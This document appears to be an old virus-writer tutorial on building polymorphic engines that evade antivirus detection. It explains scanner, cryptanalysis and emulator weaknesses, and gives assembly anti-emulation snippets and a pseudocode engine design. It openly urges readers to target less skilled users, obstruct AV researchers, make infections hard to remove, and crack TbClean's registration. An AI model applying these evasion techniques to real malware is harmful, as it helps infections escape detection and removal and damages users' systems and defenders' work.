Tutorials - Guide to improving Polymorphic Engines

Guide to improving Polymorphic Engines
by Rogue Warrior
Table of contents :-

  1. Introduction
  2. Levels of Polymorphism
  3. Polymorphic Virus Detection Methods
  4. Combatting Detection Methods
         Anti-Scan String
         Cryptanalysis
         Generic Decryption
  5. Combatting Analysis of your virus by AV researchers
  6. Conclusion

============================================================================

Introduction :-

  This is a guide for those who already know how to make an engine
  but cannot work out why their viruses are still detectable.

  The single purpose of polymorphic viruses is to avoid detection -
  at the heart of the polymorphic virus is the engine.  It can usually
  take from 30-80% of the virus code size so is a very important
  component of the virus to have working properly.

  This guide will tell you how polymorphic detectors work in
  order to help you design/make a better engine to defeat scanners.

  Making a good engine takes a good amount of time.  If you don't
  make it correctly you might as well leave it out completely
  because it's main purpose (avoiding detection) will not work!.

============================================================================

Levels of Polymorphism :-

  Polymorphism covers has many levels of skill.

  According to Vesselin Bontchev (AV) these are :-

    1. Fixed set of constant decryptors (a.k.a Oligomorphic).
    2. Variable instructions for single instruction.
    3. Garbage code insertion.
    4. Instruction swapping.
    5. 2+3+4
    ---------------------------------------------------------
    6. Permuting

  #6 is not considered higher than #5 it's simply considered a
  different classing.

  I think there is now a 7th class.  Highly advanced polymorphism
  which is designed to be better than #5.  These ones have the
  following attributes:

    * Heuristic counter-measures
    * Goat counter-measures
    * Emulator counter-measures

  All these attributes are not part of the virus but instead part
  of the _polymorphic code produced by the virus_.

============================================================================

Polymorphic Virus Detection Methods :-

  There are many methods for detecting polymorphic viruses here are some
  popular methods:

    - Scan Strings
    - Variable Scan Strings
    - Cryptanalysis
    - Generic Decryptor
    - Heuristics

  Scan Strings ::-
       Works by searching for a pattern of bytes in FIXED positions and a
       FIXED sequence.

       e.g.,

       scan string: aa ?? bb ?? cc
       virus text:  aa xx bb xx cc

  Variable Scan Strings ::-
       Work by searching for a pattern of bytes in VARIABLE positions
       but in a FIXED sequence.

       e.g.,

       scan string: aa * bb * cc
       virus text:  1. aa xx xx bb xx xx xx xx cc
                    2. aa bb xx xx xx cc
                    3. and so on...

  Cryptanalysis ::-
       Works by finding part of the VIRUS BODY and then performing some
       very basic cryptanalysis on it and then decrypting it (if possible).

       This method according to many AV is not used anymore (due to the
       effectiveness of Generic Decryptor) but I will tell you how to
       defeat it anyway just to be sure ;-) -- its not hard to defeat.

  Generic Decryptor (a.k.a. Emulation) ::-
       Works by emulating instructions in the polymorphic decryptor in order
       to make the virus decrypt itself and then it detects the virus by a
       standard scan string.

  Heuristics ::-
       This has undeservedly been a virus buzz word for a long time.  It
       has been the target of polymorph engine creators to beat the heuristics
       which shows how little they know of polymorphic detection.

       This method involves searching for inconsistencies between the code
       being analysed and normal everyday code found in programs.

       While it is important - it is not THAT important and will not help you
       stop being detected by anti virus software.

       It is important to note that heuristics is not used very much (they
       do use a bit) in the most popular AV programs (F-PROT, McAfee and AVP)
       these are the programs you should target. Do not target programs which
       only hard core virus people use.  Most of the hard core AV software
       could spot a virus anyway. -- in other words: _target the less
       intelligent software users_

============================================================================

Combatting Virus Detection Methods :-

----------------------------------------------------------------------------

  - Anti Scan String methods

   This is really easy - avoid the use of code common to every decryptor
   just because some code isn't in the same position doesn't mean it cannot
   be scanned though.  For example:

    xx=garbage code.

    Your Decryptor #1 (as hexidecimal):

     45 34 xx xx xx 54 80 xx xx xx 12 xx xx xx 34 32 xx xx xx 43 xx xx xx xx

    Your Decryptor #2:

     xx xx xx 45 30 xx xx xx xx xx 54 81 xx xx xx xx xx 12 xx xx 34 32 xx 43

   Looking at this code you can see an obvious pattern it can be scanned using
   this string:

        45 3? * 54 8? * 12 * 34 32 * 43

        Legend:
          ?     - match 1 positions only
          *     - match up to N bytes but low as 0 bytes


  This will identify this decryptor (not the virus) by looking for code common
  to each decryptor.  So how do you combat it?  Well try making sure that you
  always have at LEAST 1 alternative to every instruction your engine can
  generate.

  NOTE: Make enough alternatives that it makes multiple variable scan strings
        not an option to AV!

----------------------------------------------------------------------------
Cryptanalysis :-

        This is very easy to defeat - simple add multiple encryption
        operations for example:

        A loop using a single XOR with byte/word is very easy to cryptanalyse
        but a loop using XOR b/w, ADD b/w, SUB b/w, ROL b/w in one loop is
        VERY hard to cryptanalyse.

        The only problem with this is applying the encryptions in reverse
        order to that of your virus decryptor so that when the virus
        decryptor is run it will do it in the correct ordering.

        There is an easy way to do this! -- There isn't really I was just
        joking there is no easy way =)

        You can leave bit out anyway because AV's are using all using Generic
        Decryption as far as I know.

----------------------------------------------------------------------------

Generic Decryption :-

       This method is very popular amongst AV and requires the cooperation
       of the virus to work.  If a virus can detect it is being emulated
       and then throw an emulator off by some method then it will defeat
       this method.

       Products known to be using this technique are: F-PROT AVP TBAV DSAV
       (and I would guess McAfee?).

       How does generic decryption work? well the AV products each have in
       them a little Intel software CPU emulator which does not allow
       instructions to actually execute but simulates them enough in certain
       controlled ways in order to make the virus decrypt itself in a safe
       environment - this way all they need is a scan string for a very
       complex polymorphic virus!

       These controlled conditions avoid endless loops and other similar
       bugs in normal programs from making the emulator hang.  I
       experimented and found that making a 10 KB decryptor on a virus will
       dramatically slow down scanning in DSAV and AVP because the emulator
       is actually simulating the code.  I made 10 x 10KB samples and these
       took over 3 minutes to be examined by DSAV and AVP however each of
       these took only milliseconds to run normally.

       This shows that the emulators in DSAV and AVP are really quite good and
       don't give up easily when trying to decrypt a virus (I used the /ANALYSE
       option on DSAV).  F-PROT and TBSCAN did not emulate these samples
       correctly even with maximum heuristics enabled or if they did they must
       have discovered how to simulate INCREDIBLY quickly (even TBSCAN being
       written in assembly language cannot run them that fast).

       So how do we stop this emulation taking place? or better put: How do we
       detect ourselves being emulated and throw the emulator off?

       e.g., Imagine we know that the PSP contains a certain constant value at
       ALL times - but we also know the emulator doesn't emulate the PSP.
       With this knowledge we can construct some code in our polymorphic
       DECRYPTOR to detect this and throw the emulator off:

       mov      ax,[0000]
       sub      ax,20CDh
       jz       ok
       mov      ah,4Ch
       int      21
       ok:

       Note: This code must be in the decryptor because it's goal is to stop
       decrypting BEFORE we reach the virus body.  This code must be
       generated with the same principles of variability that all other poly
       code requires - if you don't make this code variable also then you risk
       having the code used against you to detect the virus!!!

  Possible methods to exploit for detecting and terminating emulation:

     - Inability of DOS call return values to be predicted by the emulator
       without actually calling them.  i.e., we can make a DOS call in the
       poly code and check the return values.  If they are not consistent with
       a REAL call to that function then it can be assumed we are being
       emulated and then take evasive action.

     - Inability of emulator to write to ALL of memory.  By writing to safe
       areas in RAM we can test if that area has ACTUALLY been written
       to by the virus or just emulated.  If it has not been written to
       then we assume emulation in progress.

e.g., long winded version:

       cli                      ;disable ints
       cld                      ;set data string copy direction
       push     6000h
       pop      ds              ;any segment which AV and virus don't own.
       push     ds
       pop      es              ;es=ds=6000h
       sub      si,si
       mov      di,0002
       lodsw                    ;save in ax, si=di=2
       xor      ds:[0000],1234h ;write
       mov      cx,0f000h       ;some large amount
L1:    rep      movsw           ;write to memory (a large amount is better)
       cmp      ds:[0000],ax    ;did the AV forget about the write?
       mov      ds:[0000],ax    ;set it back to normal regardless
       jz       not_emulated    ;seems they messed up remembering where we
                                ;wrote.
       mov      ah,4Ch
       int      21h             ;bye Mr Emulator.

not_emulated:

     - Inability of emulator to emulate all control structures (PSP, MCB,
SFT, etc).

       Most emulators can emulate the PSP, MCB and so on but every single
       structure would take too much memory and processing so trying to
       exploit this possible weakness is a good idea.

       TbClean a program which emulates viruses to disinfect programs
       only emulates certain small parts of the PSP leaving other parts to
       be exploited by emulation trapping.  In fact one can trick TbClean
       into converting the virus infected file into an infected Trojan horse
       program for the person who runs it next.

       NOTE: TbClean is good fun for testing your polymorphic decryptors
       it shows you how the emulator is going to go through your code like
       a hot knife through butter.  Make sure to crack the registration on
       TbClean so you can use it properly <grin>.

  - Limited resources of an emulator.

        Remember that many AV programs are built to be fast so by making your
        virus take a very long time (in AV program terms) to analyse your
        virus might make it quit thinking that it has encountered an endless
        loop.

        However! running a time consuming decryptor normally takes next to
        no time.  So we can see that resources of time, memory, processing
        power all contribute to methods for killing off an AV scanner
        emulator.

        *** You must think how to detect and force the emulator to quit ***

============================================================================

Stopping analysis of your virus by AV researchers

    AV researchers are the ones responsible for making your virus detectable
    so having some ways to hinder AV researchers doing analysis of your
    polymorphic virus and engine is always good to throw in.

    The most common way to analyse a new polymorphic virus is to generate
    1000's of samples of your virus.  This involves activating the virus on a
    test computer and executing 1000's of goat programs.

    The goal in generating these 1000's of copies is to get a good sampling of
    what the engine can generate and then test the detection method against
    it.

    If your virus chooses only to show a certain sample then their detector
    may work in the Lab but not when it comes to "in the wild" situations.

    Of course it is best to not make it obvious to AV that you are trying
    to do this or they might catch on and alter their methods.

============================================================================

Planning your engine features

  It's always good idea to have plan of the engine structure.

  Many coders spend their time byte-fiddling trying to optimise
  their code - this method of planning enables to you block-fiddle
  - each of these blocks can be shuffled and optimised meaning
  every change for the better is saving you lots of bytes instead
  of 1-2 bytes.

  NOTE: NEVER place ANY code in a CALL/RET routine unless it
        is used more than once!

  A polymorphic engine is very similar to the code generation
  phase of a compiler - most compiler writers use the word "emit" [1]
  as the word to say they're outputting code.  So try to use
  the same because it's good to follow this standard when
  planning your engine.

  [1]: Means "output" or "give off" for those bad at English.

  e.g., Here is a very basic model of an engine plan
        (you may want to add more detail than this
         to any plan you make):

   Engine:
     EmitDecryptor

   EmitDecryptor:
     repeat EmitGarbage & EmitAntiEmulation, random(5) times
     EmitSetupRegs
     repeat EmitGarbage & EmitAntiEmulation, random(5) times
     MarkLoopStart
     repeat EmitDecryptionCode, random(5) times
     repeat EmitGarbage & EmitAntiEmulation, random(5) times
     EmitEndLoop
     repeat EmitGarbage & EmitAntiEmulation, random(5) times
   End-EmitDecryptor

   EmitGarbage:
     Randomly Select 1 of:
       EmitFakeINT21   - randomly select some int 21 functions
       EmitFakeINT10   - randomly select some int 10 functions
       EmitCMPbmemXX   - cmp byte ptr [xxxx],xx
       EmitCMPwmemXXXX - cmp word ptr [xxxx],cccc
       EmitMOVbmemXX   - mov byte ptr [xxxx],cc
       EmitMOVwmemXXXX - mov word ptr [xxxx],cccc
       EmitMOVbregXX   - mov rb,cc
       EmitMOVwregXXXX - mov rx,cccc
       EmitMOVbregMEM  - mov rb,byte ptr [xxx]
       EmitMOVwregMEM  - mov rw,byte ptr [xxxx]
       EmitCALL        - CALL xxxx/garb/jmp yyyy/garb/xxxx:/garb/ret/yyyy:
       EmitJMP         - JMP xxxx/garb/xxxx:
   End-EmitGarbage

   EmitAntiEmulation:
     Randomly Select 1 of:
       EmitFarCALL       - place RETF into mem/CALL yyyy:xxxx
       EmitFarJMP        - place Far JMP into mem/JMP yyyy:xxxx
       EmitWriteAndTest  - write to known RAM mem, test it changes, if not
                           crash
       EmitFakeExit      - set int 21 = virus_cs:virus_return and call
                           ah=4c, int 21
       EmitPSPcheck      - cmp ds:[0000],21CDh/jnz crash: use better check!
                           just an example.
       EmitDOScheck      - dos call/check return value is consistent.
   End-EmitAntiEmulation

   EmitSetupRegs:
     If Boolean Then
       LoopType = Counter or Pointer
       Select Count Register from [AX,BX,CX,DX,SI,DI]
       Select Pointer Register from [SI,DI,BP]
     Else
       LoopType = Pointer
       Select Pointer Register from [SI,DI,BP]
     End If
   End-EmitSetupRegs

   MarkLoopStart:
     Save output pointer (usually DI register) to remember loop location.
   End-MarkLoopStart

   EmitDecryptionCode:
     Randomly select 1 of:
       EmitXORptr
       EmitADDptr
       EmitSUBptr
   End-EmitDecryptionCode

   EmitEndLoop:
     If LoopType=Counter and Counter=CX and Boolean Then
       EmitLoop
     Else If LoopType=Counter and Boolean Then
       EmitDECJNZ
     Else If LoopType=Counter and Boolean Then
       EmitDECJZJMP
     Else If LoopType=Pointer and Boolean Then
       EmitDECCMPJNZ
     Else If LoopType=Pointer and Boolean Then
       EmitDECCMPJZJMP
     End
   End-EmitEndLoop

   This is just a simple example of a plan so you can see how to
   structure your engine - do not forget these parts:

     - encrypting the virus body in reverse order and
       reverse operation.

     - adjusting for execution location in memory:
       if the entry point of the virus is not at a zero
       offset then you must adjust all memory references
       and pointers by the relocation amount.

       This part is usually done while emitting.

============================================================================

Conclusion

    If you are going to go the trouble of making a polymorph engine then do
    it right and don't waste 1-3Kb of code on an engine which can be
    generically decrypted.

    If you are going to make a good engine remember the following points:
       - it must not have fixed bytes in fixed positions.
       - it must not have fixed bytes in variable positions.
       - it must not be able to be decrypted by generic decryption engines
         in AV software.
       - it helps if the code is heuristically "clean" but it is not the be
         all and end all of an engine to be this way.
       - make sure it is a bitch to analyse by AV.
       - make sure it is a bitch to remove if it does get caught.

The final pain in the ass

    Some AV are obsessed with EXACT detection - even if they are able to
    detect your decryptor like they do to many some TPE based viruses - in
    the end they always want exact detection.  So try to make your engine
    such a hard ass that it might allow detection of the actual "decryptor"
    part but NOT the virus body - This will be a great annoyance to the AV
    (even though they may say otherwise).

    Remember inexact detection leads to inability to remove the virus and
    if you virus ever becomes common they will have to answer the customers
    question "why can't you remove it ?".